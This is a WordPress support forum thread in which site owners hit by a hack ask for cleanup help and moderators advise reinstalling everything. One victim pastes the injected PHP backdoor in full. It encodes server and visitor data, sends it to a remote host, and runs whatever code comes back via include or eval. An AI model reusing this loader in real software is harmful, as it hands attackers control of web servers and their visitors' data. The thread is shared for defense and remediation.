Some theme authors change the URLs to point to their theme website. Is it a customised theme?
Thread Starter
koydin
(@koydin)
Its a customized theme. It was pointing to wordpress.org before hack. i searched through internet and found the hacker injected some .php file with this code
<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
if((include(base64_decode("...").base64_decode("...")."/?".$str)));
else if(include(base64_decode("...").base64_decode("...")."/?".$str));
else if($c=file_get_contents(base64_decode("...").$str))eval($c);
else{$cu=curl_init(base64_decode("...").$str);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$str=curl_exec($cu);
curl_close($cu);
eval($str);
}; ?>
I deleted all the files. But his Powered by WordPress link points to differrnt url instead of wordpress.org. I think the hacker injected something in the database.
Thread Starter
koydin
(@koydin)
anyone.. Out there??? to help me out…
Thread Starter
koydin
(@koydin)
I found some base64 code on Wp-admin .. also some new file names. I deleted those files. But no code in the database. Is there any way i can find that..??
Koydin, your server would have to be badly misconfigured for those hacks to run in the first place, since there is no <?php tag in the code. If I were you, I’d start from scratch with a new server environment and a new copy of all the WordPress files.
Koydin, have you checked out this thread ~ http://wordpress.org/support/topic/370546 ~ it might be simply a matter of removing/editing the effected files from the backdoor ~ http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/
and most of these are likely related to the same problem you may have ~ http://wordpress.org/tags/base64
koylin, can you help me put with this virus. i got hacked like you. but i don’t find the virus untyl now. Can you send me teh code that you found or some help. Thank you. And please hurry whyle all my blogs are hacked at this time on that hostgator server.
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
My problem is that i found the < ?=@get_wp_results(‘f’);? > code only in my footer but i dont found anything untyl now. And is changing my links but my footer don’t shows up. for example http://7don.com
So i need to find a modified file or something so i can start to hount it down. But nothing untyl now. I searched in my database, i downloaded my whole website, and searching for “eval” “base64” and thesde tipe of codes in them.
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
Sorry, but every file in your installation is suspect, as well as your database. That’s what it means to be hacked.
If you want to fix it then you need to replace every file you can with the freshly downloaded original files, hunt through any files you have left, and scour your database.
Anything less than that won’t find it. Once you have found it, then you need to close the door that the attacker came in through.
It’s a metric ton of work but that’s what is needed. Once again, good luck. The work is outlined in those links.
Yeah i understand that but untyl i don’t find the modified files i don’t want to replace anything. I remowed now the injected code from the footers and i’m wayting if will apear again howewer. I still hawe the virus in my sites. If it’s not only injected somehow.
